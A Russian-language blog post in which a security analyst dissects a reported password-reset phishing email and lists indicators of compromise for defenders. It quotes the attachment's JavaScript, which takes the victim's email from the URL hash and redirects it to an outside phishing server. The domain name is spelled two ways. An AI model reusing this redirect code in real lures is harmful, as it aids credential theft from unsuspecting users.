Всем привет! Хочу поделиться, возможно, не новым, но, на мой взгляд, довольно изощренным видом фишинга. Кто-то уже наверняка сталкивался с таким методом, а для кого-то он окажется в новинку.
ПРЕДУПРЕЖДЕНИЕ: Материалы данной статьи носят исключительно ознакомительный характер и публикуются в образовательных целях. Фишинг, равно как и любые разновидности социальной инженерии, направленные на получение НСД или нарушение целостности, доступности и конфиденциальности информации, являются уголовно наказуемыми деяниями. Информация предназначена для специалистов Blue Team в интересах противодействия интернет-мошенничеству.
Письмо
Открываю рабочую почту и вижу обратную связь от пользователя, в которой он предупреждает о попытке скама.
После нескольких учебных фишинговых кампаний бдительность пользователей существенно возросла, что не может не радовать)))
Обычная рядовая ситуация: юзера пытаются соскамить на письмо из техподдержки, но он сразу раскусил обман и перенаправил письмо в Отдел ИБ.
Вложение
Открываю сохраненное письмо. Вижу классическую попытку обмана, рассчитанную на невнимательность - сброс пароля от учетной записи. Письмо отправлено с домена "etrh.ru" (зарегистрирован в РУ-сегменте, но об этом далее).
Казалось бы, обычный немного топорный скам, с которым сталкиваешься ежедневно. Видно, что мошенники особо не готовились, скорее всего запустили в массы с помощью скрипта-рассыльщика.
Механизм атаки выглядит следующим образом: код на странице cvvc.html извлекает email жертвы из хэша URL и мгновенно (через 1 мс) перенаправляет браузер на основной фишинговый сервер:
var hash = window.location.hash;
var em = hash.split('#')[1];
window.setTimeout(function() {
window.location.href = 'https://threestarcrm.com/7yy/index.php?userid=' + em;
}, 1);
ANY.RUN - REPORT
Прогоняю фишинговую ссылку через песочницу и получаю вполне очевидный результат - malicious activity
Форма авторизации любезно предлагает слить свои пароли злоумышленнику
Индикаторы компрометации (IOC)
В таблице ниже — обнаруженные в ходе короткого расследования индикаторы. Считаю своим долгом предупредить коллег из Blue Team.
2. Направлено обращение хостерам с приложением пруфов. Обратной связи пока не получил (что немного огорчает)
Резюме (коротко)
Вряд ли я открыл какую-то тайну. Домены "zil-dom.ru" и "etrh.ru", вероятно, скомпрометированы. Оба зарегистрированы на PRIVATE PERSON. Домен "treestarcrm.com" живет в Интернете около 7 лет, но блокировать его, по-видимому, никто не спешит. Методика фишинга достаточно хитрая, потому что все браузеры по умолчанию выполняют Java-срипты.
Основная опасность - это подмена содержания гиперссылки. При грамотной разведке цели мошенники могли бы вставить туда любой легитимный адрес компании и без труда обманули бы жертву, которая попыталась бы проверить ссылку, наведя на нее курсор (о чем обычно просят всех юзеров, перед тем, как кликнуть по ней). Такие вот дела.